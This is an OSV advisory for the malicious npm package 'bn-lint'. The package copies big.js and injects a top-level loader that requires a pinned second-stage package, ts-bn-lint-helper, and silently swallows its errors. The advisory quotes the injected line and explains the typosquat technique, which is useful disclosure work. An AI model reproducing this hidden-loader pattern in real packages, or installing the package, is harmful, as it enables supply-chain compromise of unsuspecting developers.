OSV ID
MAL-2026-6376
Ecosystem
npm
Summary
Package is published as 'bn-lint' but ships a verbatim copy of MikeMcl/big.js (README, source, version banner v7.0.1, and repo URL all identify as big.js). Both entrypoints, big.js and big.mjs, have been modified at lines 605-606 to inject const helper = require("ts-bn-lint-helper"); helper.from_str().then(e => e).catch(e => { }); at module top level. Any require('bn-lint') or import of the package immediately loads and invokes the separately-published, pinned ts-bn-lint-helper@3.1.19 (declared in package.json line 58). The .then(e => e).catch(e => { }) wrapping silently swallows both resolution and rejection values, suppressing logs, thrown errors, and rejected promises so the secondary payload's execution is invisible to a developer using what they believe to be a big.js arithmetic library. The combination of impersonated identity, top-level loader injection into an otherwise unrelated arithmetic library, a pinned untrusted second-stage dependency, and deliberate error suppression is consistent with a typosquat-with-payload supply-chain attack rather than a legitimate fork.
Source: amazon-inspector (c14057d91b2283926b2b0c1093a66db17c40efbd0ceb21c29b0bdbfa79736da5)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.